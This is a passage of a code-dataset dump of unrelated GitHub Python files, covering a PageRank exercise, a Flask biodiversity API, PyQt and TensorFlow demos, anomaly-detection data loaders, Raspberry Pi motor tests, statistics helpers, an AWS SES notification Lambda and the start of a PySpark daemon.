df.iloc[-2]\nprint(yesterday)","repo_name":"squasy/stock","sub_path":"balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39519738259","text":"\"\"\"\nWspółczynnik α w algorytmie PageRank nazywany jest czasem \"współczynnikiem znudzenia\" lub \"damping factor\" w języku angielskim. \nNazwa ta wynika z roli, jaką odgrywa w modelowaniu zachowania użytkowników podczas przeglądania stron internetowych.\n\nW przypadku algorytmu PageRank, α jest parametrem, który kontroluje prawdopodobieństwo, że użytkownik zamiast kliknąć w link na stronie, \nbędzie kontynuować losowe przeglądanie stron. Innymi słowy, α reprezentuje prawdopodobieństwo \"znudzenia\" użytkownika, \nktóry może zdecydować się na zmianę strony zamiast kontynuować przeglądanie zgodnie z linkami.\n\nDlaczego jest to istotne? Gdyby α było równe 1, użytkownik byłby w pełni \"zainteresowany\" i kontynuowałby klikanie w kolejne linki. \nW takim przypadku, istnieje ryzyko, że użytkownik może utknąć w pętli lub cyklu stron, co nie jest pożądane. \nDlatego też wprowadzenie współczynnika znudzenia, α < 1, pomaga uniknąć takich sytuacji, umożliwiając użytkownikowi czasem przechodzenie \nna nową stronę, niezależnie od linków na bieżącej stronie.\n\nPraktycznie, wartość α jest często ustalana na 0,85 w algorytmie PageRank, co oznacza, że istnieje 15% szansa na to, \nże użytkownik \"znudzi się\" i przejdzie do innej strony, zamiast kontynuować klikanie w linki. \nTen współczynnik znudzenia pomaga zrównoważyć algorytm, poprawiając jakość wyników wyszukiwania \ni zapobiegając utknięciu w nieskończonych pętlach stron.\n\nW ten sposób, nazywanie α \"współczynnikiem znudzenia\" odzwierciedla jego rolę w modelowaniu zachowania \nużytkowników i wprowadzeniu pewnej losowości w proces nawigacji po stronach internetowych.\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.linalg import solve\nfrom markov import (\n calculate_stationary_distribution_many,\n calculate_stationary_distribution,\n calculate_state_probability,\n)\n\n# Define the directed graph G and its transition matrix PG\nPG = np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 1 / 2, 0, 1 / 2, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 1 / 2, 0, 0, 1 / 2, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ]\n)\n\nPG2 = np.array(\n [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0],\n [1, 0, 0, 0, 0, 0],\n [0, 1 / 2, 0, 0, 1 / 2, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ]\n)\n\nalpha_values = [0, 0.15, 0.5, 1]\n\nfor alpha in alpha_values:\n stationary_distribution = calculate_stationary_distribution(PG, alpha)\n stationary_distribution2 = calculate_stationary_distribution(PG2, alpha)\n print(f\"Alpha = {alpha}:\")\n print(f\"PG:\\t\\t{[round(n,3) for n in stationary_distribution]}\")\n print(f\"PG2:\\t\\t{[round(n,3) for n in stationary_distribution2]}\")\n print(f\"PG2(MC):\\t{[round(n,3) for n in calculate_state_probability(PG2,100,alpha, random_state=True)]}\")\n print(f\"PG2(many):\\t{[round(n,3) for n in calculate_stationary_distribution_many(PG2,alpha)]}\")\n print()\n","repo_name":"corradoo/aa","sub_path":"l6/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43620723778","text":"# import necessary libraries\nimport pandas as pd\nimport numpy as np\nimport os\nfrom flask import (\n Flask,\n render_template,\n jsonify,\n request)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\nenvport = os.environ.get('PORT')\n#################################################\n# Data is fetched from csv files to Pandas dataframes\n#################################################\n\n#fetch data - csv + pandas or sqlite - chose to use csv + pandas\n# read in csv file in dataframe\nmetadata_df = pd.read_csv(\"./DataSets/Belly_Button_Biodiversity_Metadata.csv\", index_col=None)\n\n# find columns with all null values if any.\nnull_cols = metadata_df.columns[metadata_df.isnull().all()].tolist() \n\n# delete columns with all null values\nmetadata_df = metadata_df.drop(null_cols, 1) # axis = 1\n\n# Replace NaN values with 0s, as replacing with 0s won't hurt the results.\nmetadata_df = metadata_df.fillna(0)\n\n# extract required column as a list \nsample_IDs = metadata_df['SAMPLEID'].tolist()\n\nsample_names = [\"BB_\" + str(s) for s in sample_IDs]\n\n\n#################################################\n# Routes\n#################################################\n\n@app.route(\"/\")\n# Returns the dashboard homepage.\ndef home():\n # return \"Welcome!\"\n sample_names = [\"BB_\" + str(s) for s in sample_IDs]\n print(sample_names)\n return render_template('index.html', sample_names=sample_names)\n\n@app.route('/names')\n# List of sample names.\n # Returns a list of sample names in the format\n # [\n # \"BB_940\",\n # \"BB_941\",\n # \"BB_943\",\n # \"BB_944\",\n # \"BB_945\",\n # \"BB_946\",\n # \"BB_947\",\n # ...\n # ]\ndef samp_names():\n # add required prefix to each item in the list\n # sample_IDs = metadata_df['SAMPLEID'].tolist()\n sample_names = [\"BB_\" + str(s) for s in sample_IDs] # sample_IDs defined above routes\n return(jsonify(sample_names))\n\n@app.route('/otu')\n # List of OTU descriptions.\n\n # Returns a list of OTU descriptions in the following format\n\n # [\n # \"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n # \"Archaea;Euryarchaeota;Halobacteria;Halobacteriales;Halobacteriaceae;Halococcus\",\n # \"Bacteria\",\n # \"Bacteria\",\n # \"Bacteria\",\n # ...\n # ]\n\ndef otu_describe():\n # read in csv file in dataframe\n otu_df = pd.read_csv(\"./DataSets/belly_button_biodiversity_otu_id.csv\")\n otu_df = otu_df.dropna(axis=0, thresh=1) \n\n # extract required column by index only as there is no column heading\n otu_descriptions = otu_df.iloc[:, 1].values.tolist()\n return(jsonify(otu_descriptions))\n\n@app.route('/metadata/')\n # MetaData for a given sample.\n # Args: Sample in the format: `BB_940`\n # Returns a json dictionary of sample metadata in the format\n # {\n # AGE: 24,\n # BBTYPE: \"I\",\n # ETHNICITY: \"Caucasian\",\n # GENDER: \"F\",\n # LOCATION: \"Beaufort/NC\",\n # SAMPLEID: 940\n # }\n\ndef samplefunction(sample):\n # e.g. from sample argument `BB_940`, only 940 is extracted below\n sample_id = int(sample[3:])\n # single row df created below\n row_df = metadata_df.loc[metadata_df['SAMPLEID'] == sample_id]\n # df with needed columns\n sample_df = row_df[['AGE','BBTYPE','ETHNICITY','GENDER','LOCATION','SAMPLEID']]\n # 'records' arg creates a list of dictionaries (here only 1 dict)\n sample_dict = sample_df.to_dict('records') \n # [0] returns dict in { } format, without [0] it returns in [{ }] foramt as its a list.\n return(jsonify(sample_dict[0])) \n\n@app.route('/wfreq/')\n # Weekly Washing Frequency as a number.\n\n # Args: Sample in the format: `BB_940`\n\n # Returns an integer value for the weekly washing frequency `WFREQ`\n\ndef wash_freq(sample):\n # e.g. from sample argument `BB_940`, only 940 is extracted below\n sample_id = int(sample[3:])\n # single row df created below\n row_df = metadata_df.loc[metadata_df['SAMPLEID'] == sample_id] \n print(row_df)\n # df with needed columns. Rounded because BB_963 has freq 3.5 \n WFREQ = int(round((row_df.iloc[0]['WFREQ'])))\n #print(WFREQ)\n return(jsonify(WFREQ))\n\n\n@app.route('/samples/')\n # OTU IDs and Sample Values for a given sample.\n\n # Sort your Pandas DataFrame (OTU ID and Sample Value)\n # in Descending Order by Sample Value\n\n # Return a list of dictionaries containing sorted lists for `otu_ids`\n # and `sample_values`\n\n # [\n # {\n # otu_ids: [\n # 1166,\n # 2858,\n # 481,\n # ...\n # ],\n # sample_values: [\n # 163,\n # 126,\n # 113,\n # ...\n # ]\n # }\n # ]\ndef ids_values(sample):\n samples_df = pd.read_csv(\"./DataSets/belly_button_biodiversity_samples.csv\", index_col=None)\n # fill NaNs with 0's\n samples_df = samples_df.fillna(0) \n # get the 2 required columns; one is passed sample from function arg.\n id_values_df = samples_df[['otu_id', sample]].copy()\n values_descend_df = id_values_df.sort_values(sample, ascending=False)\n values_descend_df[sample] = values_descend_df[sample].astype(int) # convert sample column values to 'int's\n values_descend_df.columns = ['otu_id', 'sample_values'] # rename columns as per instruction\n values_descend_dict = values_descend_df.to_dict('list') # convert to dict in required form\n values_descend_list = [] # create list \n values_descend_list.append(values_descend_dict.copy())\n return(jsonify(values_descend_list))\n\n\n\nif __name__ == \"__main__\":\n app.run(port=int(envport) if envport != None else 5000, host=\"0.0.0.0\")\n","repo_name":"ptendolkar1/Biodiversity_unit15_HW_challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8276969802","text":"\"\"\"\nScroll area in the main window\n\"\"\"\nfrom PyQt5.QtWidgets import QScrollArea, QGroupBox, QFormLayout, QLabel, QHBoxLayout\nfrom PyQt5.QtCore import QRect\n\nfrom .h_box import HBox\nfrom .utils import get_filenames\n\n\nclass ScrollArea(QScrollArea):\n \"\"\"Class ScrollArea for main window\"\"\"\n\n def __init__(self, parent: \"MainWindow\", imgs_path: str):\n super().__init__(parent)\n\n self.parent = parent\n size = parent.size()\n self.resize(size)\n\n img_names = get_filenames(imgs_path)\n\n self.formLayout = QFormLayout()\n groupBox = QGroupBox()\n\n for img_name in img_names:\n img_path = imgs_path + img_name\n self.formLayout.addRow(HBox(parent, img_path))\n groupBox.setLayout(self.formLayout)\n\n self.setWidget(groupBox)\n self.setWidgetResizable(True)\n\n def add_rows(self, img_path_list: list) -> None:\n \"\"\"\n Adding multiple rows to scrollArea\n \"\"\"\n for img_path in img_path_list:\n self.add_row(img_path)\n\n def add_row(self, img_path) -> None:\n \"\"\"\n Adding one row to scrollArea\n \"\"\"\n self.formLayout.addRow(\n HBox(self.parent, img_path)\n )\n","repo_name":"olfori/img_downloader_app","sub_path":"collection/scroll_area.py","file_name":"scroll_area.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43644143003","text":"## 神经网络的前向传播结果,需要三部分信息:\n## 第一部分: 神经网络的输入,即从实体中提取的特征向量。\n## 第二部分: 神经网络的连接结构,即神经网络中的神经元,也称节点。\n## 第三部分: 神经网络中每个神经元中的参数。\n\nimport tensorflow as tf\n\n# 声明2个变量,并通过seed设置随机种子\nw1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n# xx 输入值的特征向量,暂时定为常量,为1*2矩阵\nx = tf.constant([[0.7,0.9]])\n\n# 通过前面描述的前向传播算法,获得神经网络的输出\na = tf.matmul(x,w1)\ny = tf.matmul(a,w2)\n\nsess = tf.Session()\n# 因为w1 w2还没运行初始化过程,所以不能直接sess.run(y)获取y值。\nsess.run(w1.initializer)\nsess.run(w2.initializer)\n\n# 获取y值\nprint(sess.run(y)) # [[ 3.95757794]]\nsess.close()\n\n#############################################\n\n## 升级版 通过placeholder写法:\nimport tensorflow as tf\n\n# 声明2个变量,并通过seed设置随机种子\nw1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n# xx 输入值的特征向量,暂时定为常量,为1*2矩阵\n# 若这里使用的是 n*m 矩阵,则在feed_dict也要传入对应格式数据\nx = tf.placeholder(tf.float32, shape=(1,2), name=\"input\")\n\n# 通过前面描述的前向传播算法,获得神经网络的输出\na = tf.matmul(x,w1)\ny = tf.matmul(a,w2)\n\nsess = tf.Session()\ninit_op = tf.global_variables_initializer()\n# initialize_all_variables被 global_variables_initializer 代替\nsess.run(init_op)\n\n# 获取y值\nprint(sess.run(y,feed_dict={x:[[0.7,0.9]]})) # [[ 3.95757794]]\nsess.close()\n","repo_name":"pingan8787/Leo_MachineLearing","sub_path":"2-TensorFlow/《tensorflow实战google深度学习框架》demo/4-TensorFlow实现神经网络-前向传播算法.py","file_name":"4-TensorFlow实现神经网络-前向传播算法.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"74861522085","text":"import os\nimport time\nimport torch\nimport numpy as np\n\nfrom PIL import Image\nfrom torch.utils import data\nimport json\nfrom joblib import Parallel, delayed\n\n\ndef parallel_load(img_dir, img_list, img_size, verbose=0):\n return Parallel(n_jobs=-1, verbose=verbose)(delayed(\n lambda file: Image.open(os.path.join(img_dir, file)).convert(\"L\").resize(\n (img_size, img_size), resample=Image.BILINEAR))(file) for file in img_list)\n\n\nclass AnomalyDetectionDataset(data.Dataset):\n def __init__(self, main_path, img_size=64, transform=None, mode=\"train\", extra_data=0, ar=0.):\n super(AnomalyDetectionDataset, self).__init__()\n assert mode in [\"train\", \"test\"]\n self.root = main_path\n self.labels = []\n self.img_id = []\n self.slices = []\n self.transform = transform if transform is not None else lambda x: x\n\n with open(os.path.join(main_path, \"data.json\")) as f:\n data_dict = json.load(f)\n\n print(\"Loading images\")\n if mode == \"train\":\n train_normal = data_dict[\"train\"][\"0\"]\n\n normal_l = data_dict[\"train\"][\"unlabeled\"][\"0\"]\n abnormal_l = data_dict[\"train\"][\"unlabeled\"][\"1\"]\n if extra_data > 0:\n abnormal_num = int(extra_data * ar)\n normal_num = extra_data - abnormal_num\n else:\n abnormal_num = 0\n normal_num = 0\n\n train_l = train_normal + normal_l[:normal_num] + abnormal_l[:abnormal_num]\n t0 = time.time()\n self.slices += parallel_load(os.path.join(self.root, \"images\"), train_l, img_size)\n self.labels += (len(train_normal) + normal_num) * [0] + abnormal_num * [1]\n self.img_id += [img_name.split('.')[0] for img_name in train_l]\n print(\"Loaded {} normal images, \"\n \"{} (unlabeled) normal images, \"\n \"{} (unlabeled) abnormal images. {:.3f}s\".format(len(train_normal), normal_num, abnormal_num,\n time.time() - t0))\n\n else: # test\n test_normal = data_dict[\"test\"][\"0\"]\n test_abnormal = data_dict[\"test\"][\"1\"]\n\n test_l = test_normal + test_abnormal\n t0 = time.time()\n self.slices += parallel_load(os.path.join(self.root, \"images\"), test_l, img_size)\n self.labels += len(test_normal) * [0] + len(test_abnormal) * [1]\n self.img_id += [img_name.split('.')[0] for img_name in test_l]\n print(\"Loaded {} test normal images, \"\n \"{} test abnormal images. {:.3f}s\".format(len(test_normal), len(test_abnormal), time.time() - t0))\n\n def __getitem__(self, index):\n img = self.slices[index]\n label = self.labels[index]\n img = self.transform(img)\n img_id = self.img_id[index]\n return img, label, img_id\n\n def __len__(self):\n return len(self.slices)\n\n\nclass SelfAnomalyDataset(data.Dataset):\n def __init__(self, main_path, img_size=64, transform=None):\n super(SelfAnomalyDataset, self).__init__()\n self.root = main_path\n self.slices = []\n self.transform = transform if transform is not None else lambda x: x\n self.anomaly_transform = self.transform\n\n with open(os.path.join(main_path, \"data.json\")) as f:\n data_dict = json.load(f)\n\n print(\"Loading images\")\n t0 = time.time()\n train_normal = data_dict[\"train\"][\"0\"]\n self.slices += parallel_load(os.path.join(self.root, \"images\"), train_normal, img_size)\n print(\"Loaded {} normal images. {:.3f}s\".format(len(train_normal), time.time() - t0))\n\n def __getitem__(self, index):\n img = self.slices[index]\n img = self.transform(img)\n if np.random.rand() > 0.5:\n img, mask = self.generate_anomaly(img, index, core_percent=0.8)\n label = 1\n else:\n mask = torch.zeros_like(img).squeeze().long()\n label = 0\n return img, label, mask\n\n def __len__(self):\n return len(self.slices)\n\n def generate_anomaly(self, image, index, core_percent=0.8):\n dims = np.array(np.shape(image)[1:]) # H x W\n core = core_percent * dims # width of core region\n offset = (1 - core_percent) * dims / 2 # offset to center core\n\n min_width = np.round(0.05 * dims[1])\n max_width = np.round(0.2 * dims[1]) # make sure it is less than offset\n\n center_dim1 = np.random.randint(offset[0], offset[0] + core[0])\n center_dim2 = np.random.randint(offset[1], offset[1] + core[1])\n patch_center = np.array([center_dim1, center_dim2])\n patch_width = np.random.randint(min_width, max_width)\n\n coor_min = patch_center - patch_width\n coor_max = patch_center + patch_width\n\n # clip coordinates to within image dims\n coor_min = np.clip(coor_min, 0, dims)\n coor_max = np.clip(coor_max, 0, dims)\n\n alpha = torch.rand(1) #\n mask = torch.zeros_like(image).squeeze()\n mask[coor_min[0]:coor_max[0], coor_min[1]:coor_max[1]] = alpha\n mask_inv = 1 - mask\n\n # mix\n anomaly_source_index = np.random.randint(0, len(self.slices))\n while anomaly_source_index == index:\n anomaly_source_index = np.random.randint(0, len(self.slices))\n anomaly_source = self.slices[anomaly_source_index]\n anomaly_source = self.anomaly_transform(anomaly_source)\n image_synthesis = mask_inv * image + mask * anomaly_source\n\n return image_synthesis, (mask > 0).long()\n","repo_name":"caiyu6666/DDAD-ASR","sub_path":"anomaly_data.py","file_name":"anomaly_data.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"52"} +{"seq_id":"2461795231","text":"from time import sleep\nfrom unittest import TestCase\nfrom RPi.GPIO import setmode, BOARD, cleanup as cleanup_gpio\n\nfrom srmlib.gpiocontrollers.motorshields import CytronMD10C\nfrom srmlib.gpiocontrollers.constants import FORWARD, BACKWARD\n\n\nclass CytronMD10CTest(TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n cls.pwm_pin = int(input(\"Enter pwm pin number: \"))\n cls.direction_pin = int(input(\"Enter direction pin number: \"))\n\n def setUp(self) -> None:\n setmode(BOARD)\n self.controller = CytronMD10C(self.direction_pin, self.pwm_pin)\n\n def tearDown(self) -> None:\n cleanup_gpio()\n\n def test__should_move_forward(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run FORWARD for 3 seconds then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = FORWARD\n self.controller.speed = 50\n sleep(3)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n\n def test__should_move_backward(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run BACKWARD for 3 seconds then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = BACKWARD\n self.controller.speed = 50\n sleep(3)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n\n def test__should_ramp_up_speed(self) -> None:\n # Arrange\n print(f\"!!! TEST - Expected Observation: Engine should run FORWARD, starting slowly and speeding up for 10 seconds total then stop\")\n input(\"Press Enter to run test...\")\n\n # Act\n self.controller.direction = FORWARD\n self.controller.speed = 20\n sleep(2)\n self.controller.speed = 40\n sleep(2)\n self.controller.speed = 60\n sleep(2)\n self.controller.speed = 80\n sleep(2)\n self.controller.speed = 100\n sleep(2)\n self.controller.speed = 0\n\n # Assert\n test_succeeded = input(\"Did the engine perform as expected? (Y/n) \").lower() in {\"\", \"y\"}\n self.assertTrue(test_succeeded)\n","repo_name":"SaskatoonRailwayModellers/SRMLib-GPIOControllers","sub_path":"tests/interactive/gpiocontrollers/test_motorshields.py","file_name":"test_motorshields.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28277192519","text":"import numpy as np\nfrom scipy.special import gamma\nfrom scipy.optimize import root\nfrom scipy import integrate\nimport scipy.stats\n\n\ndef gaussian(x, mean, var):\n return np.exp(-(x-mean)**2/(2*var)) / np.sqrt(2*np.pi*var)\n\ndef t(x, df):\n return gamma((df+1)/2) / (gamma(df/2)*np.sqrt(np.pi*df)) * (1+x**2/df)**(-(df+1)/2)\n\ndef F(x, df1, df2):\n # check x is a numpy ndarray or not\n if type(x).__module__ == 'numpy':\n xn = x.copy()\n xn[xn <= 0] = 0\n else:\n xn = x\n return gamma((df1+df2)/2) * (df1/df2)**(df1/2) * xn**(df1/2-1) \\\n / (gamma(df1/2) * gamma(df2/2) * (1+df1*xn/df2)**(df1/2+df2/2))\n\ndef chi_square(x, df):\n return (0.5**(df/2) * x**(df/2-1) * np.exp(-x/2)) / gamma(df/2)\n\ndef critical_value(func_type, alpha, **kwargs):\n \"\"\"\n find the critical value that the right area is equal to alpha\n \n Parameter:\n ---------\n func_type: 'F', 't', 'chi' or 'gaussian'.\n alpha: float\n \n **kwargs:\n dfs: tuple. degree of freedom\n mean_var: tuple. mean and variance for gaussian\n \n Return:\n ------\n a critical value that the right area is equal to alpha\n \"\"\"\n if func_type == 'F':\n dfn, dfd = kwargs.get('dfs')\n return scipy.stats.f.ppf(1-alpha, dfn=dfn, dfd=dfd)\n elif func_type == 't':\n df = kwargs.get('dfs')\n return scipy.stats.t.ppf(1-alpha, df=df)\n elif func_type == 'chi':\n df = kwargs.get('dfs')\n return scipy.stats.chi2.ppf(1-alpha, df=df)\n elif func_type == 'gaussian':\n mean_var = kwargs.get('mean_var')\n return scipy.stats.norm.ppf(1-alpha, loc=mean_var[0], scale=np.sqrt(mean_var[1]))\n \ndef find_p_value(test_type, tail, test_statistic, dfs=None):\n \"\"\"\n find p-value in the right/left/two tail hypothesis test\n \n Parameter:\n ---------\n test_type: str, 'F', 't', 'z' or 'chi'\n tail: str, 'right', 'left' or 'two'\n test_statistic: scaler, test statistic in the hypothesis test\n dfs: tuple, degree of freedom. it can be ignored if func_type = 'z'\n \n Return:\n ------\n p-value\n \"\"\"\n if test_type == 'F':\n if tail == 'right':\n return 1 - scipy.stats.f.cdf(test_statistic, dfn=dfs[0], dfd=dfs[1])\n elif tail == 'left':\n return scipy.stats.f.cdf(test_statistic, dfn=dfs[0], dfd=dfs[1])\n\n if test_type == 't':\n if tail == 'right':\n return 1 - scipy.stats.t.cdf(test_statistic, df=dfs)\n elif tail == 'left':\n return scipy.stats.t.cdf(test_statistic, df=dfs)\n elif tail == 'two':\n test_statistic = -np.abs(test_statistic)\n return 2 * scipy.stats.t.cdf(test_statistic, df=dfs)\n \n if test_type == 'chi':\n if tail == 'right':\n return 1 - scipy.stats.chi2.cdf(test_statistic, df=dfs)\n elif tail == 'left':\n return scipy.stats.chi2.cdf(test_statistic, df=dfs)\n \n if test_type == 'z':\n if tail == 'right':\n return 1 - scipy.stats.norm.cdf(test_statistic)\n elif tail == 'left':\n return scipy.stats.norm.cdf(test_statistic)\n elif tail == 'two':\n test_statistic = -np.abs(test_statistic)\n return 2 * scipy.stats.norm.cdf(test_statistic)\n\n\n\n\n\n\n'''\n\ndef critical_value(func_type, alpha, **kwargs):\n \"\"\"\n find the critical value that the right area is equal to alpha\n \n Parameter:\n ---------\n func_type: 'F', 't', 'chi' or 'gaussian'.\n alpha: float\n \n **kwargs:\n dfs: tuple. degree of freedom\n mean_var: tuple. mean and variance for gaussian\n \n Return:\n ------\n a critical value that the right area is equal to alpha\n \"\"\"\n if kwargs.keys() - set(['dfs', 'mean_var']):\n # kwargs contains some not allowed keyword parameter\n raise ValueError(\"unrecognized kwargs. only 'dfs' and 'mean_var' available.\")\n if not kwargs.get('dfs') and not kwargs.get('mean_var'):\n raise ValueError(\"miss keyword argument 'dfs' or 'mean_var'.\")\n \n dfs = kwargs.get('dfs')\n mean_var = kwargs.get('mean_var')\n \n if func_type == 'F':\n f = lambda x: integrate.quad(F, x, 40, args=dfs)[0] - alpha\n elif func_type == 't':\n f = lambda x: integrate.quad(t, x, 20, args=dfs)[0] - alpha\n elif func_type == 'chi':\n f = lambda x: integrate.quad(chi_square, x, 80, args=dfs)[0] - alpha\n elif func_type == 'gaussian':\n f = lambda x: integrate.quad(gaussian, x, mean_var[1]*6, args=mean_var)[0] - alpha\n\n return root(f, x0=1).x\n\ndef find_p_value(test_type, tail, test_statistic, dfs=None):\n \"\"\"\n find p-value in the right/left/two tail hypothesis test\n \n Parameter:\n ---------\n test_type: str, 'F', 't', 'z' or 'chi'\n tail: str, 'right', 'left' or 'two'\n test_statistic: scaler, test statistic in the hypothesis test\n dfs: tuple, degree of freedom. it can be ignored if func_type = 'z'\n \n Return:\n ------\n p-value\n \"\"\"\n if tail == 'right':\n m = 1\n ep = [60, 20, 10, 80] # endpoint of intergrate\n elif tail == 'left':\n m = -1\n ep = [0, -20, -10, 0]\n elif tail == 'two':\n m = 2\n ep = [60, 20, 10, 80]\n test_statistic = np.abs(test_statistic)\n \n if test_type == 'F':\n return m * integrate.quad(F, test_statistic, test_statistic+ep[0], args=dfs)[0]\n elif test_type == 't':\n return m * integrate.quad(t, test_statistic, test_statistic+ep[1], args=dfs)[0]\n elif test_type == 'z':\n return m * integrate.quad(gaussian, test_statistic, test_statistic+ep[2], args=(0,1))[0]\n elif test_type == 'chi':\n return return m * integrate.quad(chi_square, test_statistic, test_statistic+ep[2], args=dfs)[0]\n else:\n raise ValueError(\"Unpermitted func_type\")\n \n'''","repo_name":"CYehLu/Regression-Analysis","sub_path":"Regression/Inner/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18480672418","text":"import json\nimport urllib.parse\nfrom datetime import datetime, timedelta\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\n# Deactiviating as of 2022-07-12 - lambda subscribed to sqs makes it poll 1000s of times a month.\n# from botocore.vendored import requests\n\n\ndef send_ses_email(\n s3_key=\"DEFAULT\", s3_bucket=\"DEFAULT\", s3_event_time=\"DEFAULT\", kwargs=\"\"\n):\n SENDER = \"jyablonski9@gmail.com\"\n RECIPIENT = \"jyablonski9@gmail.com\"\n # CONFIGURATION_SET = \"ConfigSet\"\n AWS_REGION = \"us-east-1\"\n\n SUBJECT = f\"{s3_key} S3 FILE ARRIVED IN {s3_bucket} at {s3_event_time}\"\n\n # The email body for recipients with non-HTML email clients.\n BODY_TEXT = f\"{kwargs}{s3_key} arrived in {s3_bucket} at {s3_event_time}\"\n\n # The HTML body of the email.\n BODY_HTML = f\"\"\"\n \n \n

Amazon SES Test (SDK for Python)

\n

This email was sent with\n Amazon SES using the\n \n AWS SDK for Python (Boto).

\n
\n {s3_key} arrived in {s3_bucket} at {s3_event_time}\n \n \n \"\"\"\n\n CHARSET = \"UTF-8\"\n client = boto3.client(\"ses\", region_name=AWS_REGION)\n try:\n response = client.send_email(\n Destination={\"ToAddresses\": [RECIPIENT,],},\n Message={\n \"Body\": {\n \"Html\": {\"Charset\": CHARSET, \"Data\": BODY_HTML,},\n \"Text\": {\"Charset\": CHARSET, \"Data\": BODY_TEXT,},\n },\n \"Subject\": {\"Charset\": CHARSET, \"Data\": SUBJECT,},\n },\n Source=SENDER,\n # ConfigurationSetName=CONFIGURATION_SET,\n )\n except ClientError as e:\n print(e.response[\"Error\"][\"Message\"])\n else:\n print(\"Email sent! Message ID:\"),\n print(response[\"MessageId\"])\n\n\nprint(\"Loading function\")\n\ns3 = boto3.client(\"s3\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n SQS Lambda Function - Format is S3 -> SNS -> SQS -> Lambda.\n The S3 notification code in inside ['body']['Message']\n The for loops are to iterate throguh dict lists (elements 0, 1, 2), instead of going event['Records'][0]\n \"\"\"\n # print(event)\n try:\n for s3_event in event[\"Records\"]:\n df = json.loads(json.loads(s3_event[\"body\"])[\"Message\"])\n for s3_record in df[\"Records\"]:\n bucket = s3_record[\"s3\"][\"bucket\"][\"name\"]\n print(f\"Grabbing Bucket {bucket}\")\n\n key = s3_record[\"s3\"][\"object\"][\"key\"]\n print(f\"Grabbing key {key}\")\n\n event_time = s3_record[\"eventTime\"]\n print(f\"Grabbing event time {event_time}\")\n\n send_ses_email(key, bucket, event_time)\n print(f\"Sending SES Email\")\n except BaseException as e:\n print(f\"Error Occurred, {e}\")\n send_ses_email(kwargs=e)\n df = (\n []\n ) # if you do raise e instead of this, lambda will keep retrying and using resources instead of just stopping.\n return df\n","repo_name":"jyablonski/aws_terraform","sub_path":"lambdas/lambda_sqs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16676384509","text":"import os\nimport sys\nimport multiprocessing\nfrom ctypes import c_bool\nfrom errno import EINTR, ECHILD\nfrom socket import socket, AF_INET, SOCK_STREAM, SOMAXCONN\nfrom signal import signal, SIGHUP, SIGTERM, SIGCHLD, SIG_DFL, SIG_IGN\nfrom pyspark.worker import main as worker_main\nfrom pyspark.serializers import write_int\n\ntry:\n POOLSIZE = multiprocessing.cpu_count()\nexcept NotImplementedError:\n POOLSIZE = 4\n\nexit_flag = multiprocessing.Value(c_bool, False)\n\n\ndef should_exit():\n global exit_flag\n return exit_flag.value\n\n\ndef compute_real_exit_code(exit_code):\n # SystemExit's code can be integer or string, but os._exit only accepts integers\n import numbers\n if isinstance(exit_code, numbers.Integral):\n return exit_code\n else:\n return 1\n\n\ndef worker(listen_sock):\n # Redirect stdout to stderr\n os.dup2(2, 1)\n\n # Manager sends SIGHUP to request termination of workers in the pool\n def handle_sighup(*args):\n assert should_exit()\n signal(SIGHUP, handle_sighup)\n\n # Cleanup zombie children\n def handle_sigchld(*args):\n pid = status = None\n try:\n while (pid, status) != (0, 0):\n pid, status = os.waitpid(0, os.WNOHANG)\n except EnvironmentError as err:\n if err.errno == EINTR:\n # retry\n handle_sigchld()\n elif err.errno != ECHILD:\n raise\n signal(SIGCHLD, handle_sigchld)\n\n # Handle clients\n while not should_exit():\n # Wait until a client arrives or we have to exit\n sock = None\n while not should_exit() and sock is None:\n try:\n sock, addr = 